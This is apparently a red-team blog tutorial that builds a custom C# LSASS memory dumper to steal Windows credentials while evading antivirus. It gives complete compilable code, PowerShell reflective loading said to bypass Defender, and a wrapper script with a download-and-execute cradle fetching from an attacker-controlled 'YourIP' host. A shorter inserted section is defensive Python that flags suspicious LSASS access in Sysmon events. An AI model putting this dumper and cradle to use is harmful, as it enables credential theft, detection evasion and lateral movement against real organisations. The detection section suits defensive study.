Introduction
After compromising a machine, a Red Team operator's actions must not be detected by antivirus software. And when moving from one compromised machine to the next, the operator needs to dump credentials. If you use Mimikatz, antivirus will detect it. If you don't want to be caught, you have to write your own tool. We can do that with the MiniDumpWriteDump function to dump the LSASS process.
LSASS process
Local Security Authority Subsystem Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.
This means that any user logging into the machine will have their credentials stored in the LSASS process.
Custom Code
In dbghelp.dll there is a function named MiniDumpWriteDump. With it, we can dump the LSASS process's memory into a file and extract credentials from that dump.
The syntax of MiniDumpWriteDump is:
```c
BOOL MiniDumpWriteDump(
  [in] HANDLE                            hProcess,
  [in] DWORD                             ProcessId,
  [in] HANDLE                            hFile,
  [in] MINIDUMP_TYPE                     DumpType,
  [in] PMINIDUMP_EXCEPTION_INFORMATION   ExceptionParam,
  [in] PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
  [in] PMINIDUMP_CALLBACK_INFORMATION    CallbackParam
);
```
Now let's write the C# declaration with a bit of help from P/Invoke.
```csharp
[DllImport("Dbghelp.dll")]
static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
```
We also need the OpenProcess function:
```c
HANDLE OpenProcess(
  [in] DWORD dwDesiredAccess,
  [in] BOOL  bInheritHandle,
  [in] DWORD dwProcessId
);
```
```csharp
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
```
Now we have all the pieces we need, so let's write the code.
First, get the LSASS process ID.
```csharp
Process[] lsass = Process.GetProcessesByName("lsass");
int lsassPID = lsass[0].Id;
```
Then get a handle to the LSASS process.
```csharp
// 0x001F0FFF is PROCESS_ALL_ACCESS.
IntPtr handle = OpenProcess(0x001F0FFF, false, lsassPID);
```
After that, dump the LSASS process's memory to a file.
```csharp
string filePath = args[0];
FileStream dumpFile = new FileStream(filePath, FileMode.Create);
// DumpType 2 is MiniDumpWithFullMemory.
bool dumped = MiniDumpWriteDump(handle, lsassPID, dumpFile.SafeFileHandle.DangerousGetHandle(), 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
```
The complete program:
```csharp
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;

namespace dumper
{
    public class Program
    {
        [DllImport("Dbghelp.dll", SetLastError = true)]
        static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);

        public static void Main(string[] args)
        {
            // Locate LSASS by name and take its process ID.
            Process[] lsass = Process.GetProcessesByName("lsass");
            int lsassPID = lsass[0].Id;

            // 0x001F0FFF is PROCESS_ALL_ACCESS.
            IntPtr handle = OpenProcess(0x001F0FFF, false, lsassPID);

            string filePath = args[0];
            // 'using' closes the file handle once the dump has been written.
            using (FileStream dumpFile = new FileStream(filePath, FileMode.Create))
            {
                // DumpType 2 is MiniDumpWithFullMemory.
                bool dumped = MiniDumpWriteDump(handle, lsassPID, dumpFile.SafeFileHandle.DangerousGetHandle(), 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
                Console.WriteLine(dumped
                    ? "Dump written to " + filePath
                    : "MiniDumpWriteDump failed, Win32 error " + Marshal.GetLastWin32Error());
            }
        }
    }
}
```
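The three calls in the program above (find the LSASS PID, OpenProcess, MiniDumpWriteDump) are what Sysmon Event ID 10 (ProcessAccess) records from the target's side: the source image, the GrantedAccess mask and a CallTrace of the requesting thread. The following Python is an added example, not code from the original post, showing how a defender would triage such events; the sample events, the allowlist path and the dict layout of the fields are constructed for this example. It goes beyond the post's 0x001F0FFF case by also keying on the dump-helper DLLs in the call stack and on lower access masks that still permit reading memory.

```python
"""Triage Sysmon Event ID 10 (ProcessAccess) records for handles opened on lsass.exe.

Added example with constructed telemetry; not from the original post.
"""
from typing import Dict, List, Optional, Tuple

# Win32 access-right bits relevant to reading another process's memory.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_ALL_ACCESS = 0x001F0FFF  # the mask the post's OpenProcess call requests

# Modules that implement MiniDumpWriteDump. A frame from either in the
# CallTrace is a widely used indicator (public Sigma rules key on it).
DUMP_MODULES = ("dbghelp.dll", "dbgcore.dll")

# Hypothetical allowlist of source images (full path, lower-case) that read
# lsass memory legitimately, e.g. an EDR agent. Tune per environment.
ALLOWLIST = (r"c:\program files\example-edr\agent.exe",)


def classify(event: Dict) -> Optional[Tuple[str, List[str]]]:
    """Return (severity, reasons) for a suspicious lsass access, else None."""
    if event.get("EventID") != 10:
        return None
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    if event.get("SourceImage", "").lower() in ALLOWLIST:
        return None

    granted = int(event.get("GrantedAccess", "0x0"), 16)
    calltrace = event.get("CallTrace", "").lower()
    read_rights = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION
    reasons = []

    if any(mod in calltrace for mod in DUMP_MODULES):
        reasons.append("minidump module in call stack")
    if (granted & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS:
        reasons.append("PROCESS_ALL_ACCESS on lsass")
    elif (granted & read_rights) == read_rights:
        reasons.append("memory read rights on lsass")
    if not reasons:
        return None  # handle cannot read lsass memory; out of scope here

    # Sysmon prints UNKNOWN(<addr>) for frames outside any loaded module, which
    # is what JIT-compiled .NET code loaded via Reflection.Assembly looks like.
    if "unknown(" in calltrace:
        reasons.append("unbacked code in call stack")

    severity = "medium" if reasons == ["memory read rights on lsass"] else "high"
    return severity, reasons


def scan(events: List[Dict]) -> List[Dict]:
    """Apply classify() to a batch and return one alert per suspicious event."""
    alerts = []
    for ev in events:
        verdict = classify(ev)
        if verdict is not None:
            alerts.append({"time": ev["UtcTime"], "source": ev["SourceImage"],
                           "severity": verdict[0], "reasons": verdict[1]})
    return alerts


# Constructed sample events (not real telemetry), flattened into dicts.
SAMPLE_EVENTS = [
    {   # the post's DLL loaded into PowerShell: full access, JIT frames show as UNKNOWN
        "EventID": 10, "UtcTime": "2024-01-01 10:00:01.000",
        "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "TargetImage": r"C:\Windows\system32\lsass.exe",
        "GrantedAccess": "0x1F0FFF",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4b4|C:\Windows\System32\KERNELBASE.dll+2c1ce|UNKNOWN(00007FFB1A2B3C4D)",
    },
    {   # a native binary with a smaller mask; dbgcore.dll appears in the stack
        "EventID": 10, "UtcTime": "2024-01-01 10:00:02.000",
        "SourceImage": r"C:\Users\tester\tool.exe",
        "TargetImage": r"C:\Windows\system32\lsass.exe",
        "GrantedAccess": "0x1410",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4b4|C:\Windows\SYSTEM32\dbgcore.dll+1b2c3|C:\Users\tester\tool.exe+1a2b",
    },
    {   # benign: query-limited information only (0x1000), as Task Manager does
        "EventID": 10, "UtcTime": "2024-01-01 10:00:03.000",
        "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
        "TargetImage": r"C:\Windows\system32\lsass.exe",
        "GrantedAccess": "0x1000",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4b4|C:\Windows\System32\KERNELBASE.dll+2c1ce",
    },
    {   # allowlisted agent (hypothetical path) with broad rights
        "EventID": 10, "UtcTime": "2024-01-01 10:00:04.000",
        "SourceImage": r"C:\Program Files\Example-EDR\agent.exe",
        "TargetImage": r"C:\Windows\system32\lsass.exe",
        "GrantedAccess": "0x1FFFFF",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4b4",
    },
    {   # different target process; ignored
        "EventID": 10, "UtcTime": "2024-01-01 10:00:05.000",
        "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "TargetImage": r"C:\Windows\system32\notepad.exe",
        "GrantedAccess": "0x1F0FFF",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4b4|UNKNOWN(00007FFB1A2B3C4D)",
    },
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Loading the DLL reflectively keeps it off disk, but the handle to LSASS is still opened by the host process (powershell.exe in the post's test), so the event is attributed to it and the JIT-compiled frames show up as UNKNOWN. Two platform controls sit upstream of this detection: LSA Protection (RunAsPPL) makes OpenProcess with memory-read rights fail for non-protected callers, and Credential Guard keeps the secrets out of LSASS memory so the dump has little to yield.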
Compile it
Now we can compile it with csc as a DLL.
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe /target:library /out:dumper.dll dump.cs
```
After compiling the source code, let's check whether any antivirus catches the tool.
As the results show, none of them detect it! Awesome.
Test Time with Defender
Since we have a DLL, we can load and run it directly from PowerShell via Reflection.Assembly.
First, load the DLL file.
```powershell
[Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\dumper.dll"))
```
Then run it.
```powershell
[dumper.Program]::Main('C:\users\tester\desktop\l5455.dmp')
ls 'C:\users\tester\desktop\l5455.dmp'
```
We managed to dump the LSASS process and bypass Windows Defender.
Last Move
Finally, we can wrap the DLL in a PowerShell script that loads it through reflection and dumps the LSASS process.
```powershell
function LSASS-Dumper
{
    Param(
        [Parameter(Mandatory = $false, Position = 0)]
        [string]$Path)

    if ($Path)
    {
        # The embedded base64 is the compiled dumper.dll.
        [System.Reflection.Assembly]::Load([Convert]::FromBase64String("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")) | Out-Null
        [dumper.Program]::Main($Path)
    }
    else
    {
        Write-Warning '- Enter the path!'
        Write-Warning '[Example] LSASS-Dumper -Path C:\windows\temp\dump.log'
    }
}
```
You can import the LSASS-Dumper function and run it.
```powershell
Import-Module .\script.ps1
# Or
IEX (New-Object Net.WebClient).DownloadString('http://YourIP/script.ps1')
LSASS-Dumper -Path C:\windows\temp\dump.log
```